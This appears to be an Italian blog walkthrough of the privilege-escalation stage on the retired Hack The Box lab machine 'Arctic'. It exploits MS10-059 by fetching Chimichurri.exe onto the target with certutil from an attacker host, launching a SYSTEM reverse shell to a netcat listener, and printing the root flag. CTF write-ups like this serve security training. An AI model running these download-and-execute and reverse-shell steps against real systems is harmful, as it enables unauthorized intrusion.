HTB – Arctic {retired}

Verifichiamo la versione del Sistema Operativo e delle patch alla ricerca di vulnerablità per l’escalation dei privilegi. Vediamo che è installata una versione di Microsoft Windows Server 2008 R2 Standard versione 6.1.7600 N/A Build 7600.
Troviamo la vulnerabilità MS10-059 che può essere consultata al link https://www.exploit-db.com/exploits/14610/

C:\>systeminfo
systeminfo

Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00477-001-0000421-84900
Original Install Date:     22/3/2017, 11:09:45   
System Boot Time:          29/12/2017, 3:34:21   
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2600 Mhz
                           [02]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2600 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 5/4/2016
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.024 MB
Available Physical Memory: 88 MB
Virtual Memory: Max Size:  2.048 MB
Virtual Memory: Available: 1.085 MB
Virtual Memory: In Use:    963 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.11

Scarichiamo in locale il payload e lo trasferiamo sulla macchina target con il comando certutil.exe usando la sintassi: certutil.exe -urlcache -split -f <URL FILE DA SCARICARE> <NOME FILE SCARICATO> avendo l’accortezza di posizionarci nella directory /Users/tolis/Downloads.

C:\Users\tolis\Downloads>certutil.exe -urlcache -split -f http://10.10.14.3/Chimichurri.exe Chimichurri.exe
certutil.exe -urlcache -split -f http://10.10.14.3/Chimichurri.exe Chimichurri.exe
http://10.10.14.3/Chimichurri.exe

WinHttp Cache entries: 1

****  Online  ****
CertUtil: -URLCache command completed successfully.

C:\Users\tolis\Downloads>

Eseguiamo il payload indicando IP della macchina kali e porta.

C:\Users\tolis\Downloads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is F88F-4EA5

 Directory of C:\Users\tolis\Downloads

14/06/2020  04:00 ��    <DIR>          .
14/06/2020  04:00 ��    <DIR>          ..
14/06/2020  04:10 ��            97.280 Chimichurri.exe
               1 File(s)         97.280 bytes
               2 Dir(s)  33.184.137.216 bytes free

C:\Users\tolis\Downloads>Chimichurri.exe                   
Chimichurri.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
C:\Users\tolis\Downloads>Chimichurri.exe 10.10.14.4 6667
Chimichurri.exe 10.10.14.4 6667
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>
C:\Users\tolis\Downloads>

Ci mettiamo in ascolto sulla porta indicata quando abbiamo lanciato il payload.

kali@kali:~$ nc -vlp 6667
listening on [any] 6667 ...
10.10.10.11: inverse host lookup failed: Unknown host
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.11] 49333
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\tolis\Downloads>

Ottenuta la shell navighiamo fino al Desktop di Administrator ed otteniamo la seconda flag.

C:\Users\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is F88F-4EA5

 Directory of C:\Users\Administrator

22/03/2017  09:10 ��    <DIR>          .
22/03/2017  09:10 ��    <DIR>          ..
22/03/2017  08:47 ��    <DIR>          Contacts
22/03/2017  10:02 ��    <DIR>          Desktop
22/03/2017  08:47 ��    <DIR>          Documents
22/03/2017  08:47 ��    <DIR>          Downloads                                                                                                                               
22/03/2017  08:47 ��    <DIR>          Favorites                                                                                                                               
22/03/2017  08:47 ��    <DIR>          Links                                                                                                                                   
22/03/2017  08:47 ��    <DIR>          Music                                                                                                                                   
22/03/2017  08:47 ��    <DIR>          Pictures                                                                                                                                
22/03/2017  08:47 ��    <DIR>          Saved Games                                                                                                                             
22/03/2017  08:47 ��    <DIR>          Searches                                                                                                                                
22/03/2017  08:47 ��    <DIR>          Videos                                                                                                                                  
               0 File(s)              0 bytes
              13 Dir(s)  33.184.129.024 bytes free

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is F88F-4EA5

 Directory of C:\Users\Administrator\Desktop

22/03/2017  10:02 ��    <DIR>          .
22/03/2017  10:02 ��    <DIR>          ..
22/03/2017  10:02 ��                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  33.184.129.024 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
ce65ceee66b2b5ebaff07e50508ffb90
C:\Users\Administrator\Desktop>

Dalla console di Hack The Box possiamo vedere che abbiamo sottomesso con successo la chiave per l’accesso “user” e la chiave per l’accesso “root”.

Leave a Reply

Your email address will not be published. Required fields are marked *